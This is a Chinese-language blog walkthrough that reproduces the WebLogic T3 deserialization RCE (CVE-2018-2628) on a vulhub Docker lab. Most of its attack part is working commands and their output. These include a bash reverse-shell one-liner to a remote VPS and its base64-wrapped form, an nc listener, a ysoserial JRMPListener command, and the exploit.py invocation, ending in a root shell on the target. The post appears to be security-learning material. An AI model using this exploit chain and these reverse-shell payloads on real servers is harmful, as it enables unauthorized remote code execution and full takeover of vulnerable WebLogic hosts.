好久没发新文章了,躲懒了,是时候该更新一篇了,这一篇是关于WebLogic T3协议反序列化命令执行漏洞(CVE-2018- 2628)的复现,该漏洞是weblogic的经典漏洞,而网上有关的复现稍显麻烦且方式有些老旧,特此更新一篇。
Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中,并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3
此次复现使用vulhub中的/vulhub-master/weblogic/CVE-2018-2628中靶场,具体靶场搭建这里就不多赘述了,参考vulhub官网即可。
开启靶场:docker-compose up -d
vf@vf-virtual-machine:~/vulhub-master/weblogic/CVE-2018-2628$ sudo docker-compose up -d
Creating network "cve20182628_default" with the default driver
Pulling weblogic (vulhub/weblogic:10.3.6.0-2017)…
10.3.6.0-2017: Pulling from vulhub/weblogic
6599cadaf950: Pull complete
23eda618d451: Pull complete
f0be3084efe9: Pull complete
52de432f084b: Pull complete
a3ed95caeb02: Pull complete
a2318f26c625: Pull complete
1aa642dd8cc1: Pull complete
b307208f8bf5: Pull complete
1dfbbdcc497d: Pull complete
a53e674a7606: Pull complete
5f06bb51fa3c: Pull complete
ff0ff72567f2: Pull complete
684862046025: Pull complete
abbf8d475455: Pull complete
848eb11ef744: Pull complete
2f3438f2b83b: Pull complete
8e5871e15571: Pull complete
Digest: sha256:275ec19477cfda389dc1c42158033e7e8c650dd4cba9f090ca0ba673902b73c9
Status: Downloaded newer image for vulhub/weblogic:10.3.6.0-2017
Creating cve20182628_weblogic_1 …
Creating cve20182628_weblogic_1 … done
访问ip:7001/console出现如下页面表示靶场搭建成功。这里的ip为192.168.28.136(靶机ip)
使用相应的poc脚本进行检测即可
poc地址:https://github.com/Aedoo/CVE-2018-2628-MultiThreading
可见检出漏洞:
注意,该命令执行漏洞没有回显,因此只能对目标机执行代码而无法返回执行结果,所以,这里我们直接进行反弹shell:
反弹shell payload准备:
bash -i >& /dev/tcp/远端vps-ip/8888 0>&1
由于Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,所以我们使用base64的反弹shell形式,具体如下:
bash -c {echo,上面反弹shell的base64编码}|{base64,-d}|{bash,-i}
远端vps监听端口:
root@VM-0-17-ubuntu:/home/ubuntu# nc -lnvp 8888
Listening on 0.0.0.0 8888
下载反序列化漏洞利用工具jar文件:ysoserial.jar
地址:https://github.com/frohoff/ysoserial。按照说明生成jar文件即可。
远端vps开启JRMP Server端口监听,端口随意,这里设置为38080
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 38080 CommonsCollections1 'bash -c {echo,反弹shell的base64编码}|{base64,-d}|{bash,-i}'
* Opening JRMP listener on 38080
出现Opening JRMP listener on 38080即表明jrmp server监听成功。
到这里,反弹shell的环境就准备完毕,下面下载exp:
exp地址:https://www.exploit-db.com/exploits/44553
copy代码,保存为exploit.py
攻击机payload准备:
python2 exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
这里的victim ip/port 为靶机的ip和端口,path to ysoserial为ysoserial.jar文件的路径,因为这个exp会调用这个jar,JRMPListener ip/port为jrmp server服务器的ip和监听的端口,这里端口为38080。JRMPClient有两个选项,为:JRMPClient或JRMPClient2,这里使用JRMPClient。
最终payload:
python2 exploit.py 192.168.28.136 7001 /home/kali/Desktop/weblogic/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 远端vps-ip 38080 JRMPClient
执行exp:
┌──(kali㉿kali)-[~/Desktop/weblogic]
└─$ python2 exploit.py 192.168.28.136 7001 /home/kali/Desktop/weblogic/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar xxx.xxx.xxx.xxx 38080 JRMPClient
handshake successful
send request payload successful,recv length:1690
command: java -jar /home/kali/Desktop/weblogic/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar JRMPClient xxx.xxx.xxx.xxx:38080 > payload.out
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
payload: …
response: …
…
exploit completed!
回显exploit completed表明执行完毕,回看vps监听端口可见:
root@VM-0-17-ubuntu:/home/ubuntu# nc -lnvp 8888
Listening on 0.0.0.0 8888
Connection received on xxx.xxx.xxx.xxx 50634
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@06ff6f667a1a:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
<Middleware/user_projects/domains/base_domain# whoami
root
反弹shell成功。
复现完毕。
手机扫一扫
移动阅读更方便
你可能感兴趣的文章